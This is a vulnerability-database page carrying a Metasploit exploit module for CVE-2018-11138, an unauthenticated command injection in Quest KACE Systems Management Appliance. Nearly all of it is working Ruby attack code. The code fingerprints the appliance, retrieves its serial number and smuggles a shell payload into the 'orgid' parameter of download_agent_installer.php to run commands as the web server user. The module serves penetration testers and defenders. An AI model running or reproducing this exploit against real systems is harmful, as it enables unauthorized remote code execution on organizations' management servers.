Quest KACE Systems Management Command Injection

2018.06.27
Credit: Brendan Coles
Risk: High
Local: No
Remote: Yes
CVE: CVE-2018-11138
CWE: CWE-78


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Quest KACE Systems Management Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability in Quest KACE Systems Management Appliance version 8.0.318 (and possibly prior). The `download_agent_installer.php` file allows unauthenticated users to execute arbitrary commands as the web server user `www`. A valid Organization ID is required. The default value is `1`. A valid Windows agent version number must also be provided. If file sharing is enabled, the agent versions are available within the `\\kace.local\client\agent_provisioning\windows_platform` Samba share. Additionally, various agent versions are listed on the KACE website. This module has been tested successfully on Quest KACE Systems Management Appliance K1000 version 8.0 (Build 8.0.318). }, 'License' => MSF_LICENSE, 'Privileged' => false, 'Platform' => 'unix', # FreeBSD 'Arch' => ARCH_CMD, 'DisclosureDate' => 'May 31 2018', 'Author' => [ 'Leandro Barragan', # Discovery and PoC 'Guido Leo', # Discovery and PoC 'Brendan Coles', # Metasploit ], 'References' => [ ['CVE', '2018-11138'], ['URL', 'https://support.quest.com/product-notification/noti-00000134'], ['URL', 'https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities'] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x27", 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl' } }, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0)) register_options [ OptString.new('SERIAL', [false, 'Serial number', '']), OptString.new('ORGANIZATION', [true, 'Organization ID', '1']), OptString.new('AGENT_VERSION', [true, 'Windows agent version', '8.0.152']) ] end def check res = send_request_cgi('uri' => normalize_uri('common', 'download_agent_installer.php')) unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.code == 302 && res.headers.to_s.include?('X-KACE-Appliance') vprint_status 'Remote host is not a Quest KACE appliance' return CheckCode::Safe end unless res.headers['X-KACE-Version'] =~ /\A([0-9]+)\.([0-9]+)\.([0-9]+)\z/ vprint_error 'Could not determine KACE appliance version' return CheckCode::Detected end version = Gem::Version.new res.headers['X-KACE-Version'].to_s vprint_status "Found KACE appliance version #{version}" # Patched versions : https://support.quest.com/product-notification/noti-00000134 if version < Gem::Version.new('7.0') || (version >= Gem::Version.new('7.0') && version < Gem::Version.new('7.0.121307')) || (version >= Gem::Version.new('7.1') && version < Gem::Version.new('7.1.150')) || (version >= Gem::Version.new('7.2') && version < Gem::Version.new('7.2.103')) || (version >= Gem::Version.new('8.0') && version < Gem::Version.new('8.0.320')) || (version >= Gem::Version.new('8.1') && version < Gem::Version.new('8.1.108')) return CheckCode::Appears end CheckCode::Safe end def serial_number return datastore['SERIAL'] unless datastore['SERIAL'].to_s.eql? '' res = send_request_cgi('uri' => normalize_uri('common', 'about.php')) return unless res res.body.scan(/Serial Number: ([A-F0-9]+)/).flatten.first end def exploit check_code = check unless [CheckCode::Appears, CheckCode::Detected].include? check_code fail_with Failure::NotVulnerable, 'Target is not vulnerable' end serial = serial_number if serial.to_s.eql? '' print_error 'Could not retrieve appliance serial number. Try specifying a SERIAL.' return end vprint_status "Using serial number: #{serial}" print_status "Sending payload (#{payload.encoded.length} bytes)" vars_get = Hash[{ 'platform' => 'windows', 'serv' => Digest::SHA256.hexdigest(serial), 'orgid' => "#{datastore['ORGANIZATION']}#; #{payload.encoded} ", 'version' => datastore['AGENT_VERSION'] }.to_a.shuffle] res = send_request_cgi({ 'uri' => normalize_uri('common', 'download_agent_installer.php'), 'vars_get' => vars_get }, 10) unless res fail_with Failure::Unreachable, 'Connection failed' end unless res.headers.to_s.include?('KACE') || res.headers.to_s.include?('KBOX') fail_with Failure::UnexpectedReply, 'Unexpected reply' end case res.code when 200 print_good 'Payload executed successfully' when 404 fail_with Failure::BadConfig, 'The specified AGENT_VERSION is not valid for the specified ORGANIZATION' when 302 if res.headers['location'].include? 'error.php' fail_with Failure::UnexpectedReply, 'Server encountered an error' end fail_with Failure::BadConfig, 'The specified SERIAL is incorrect' else print_error 'Unexpected reply' end register_dir_for_cleanup "/tmp/agentprov/#{datastore['ORGANIZATION']}#;/" end end


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top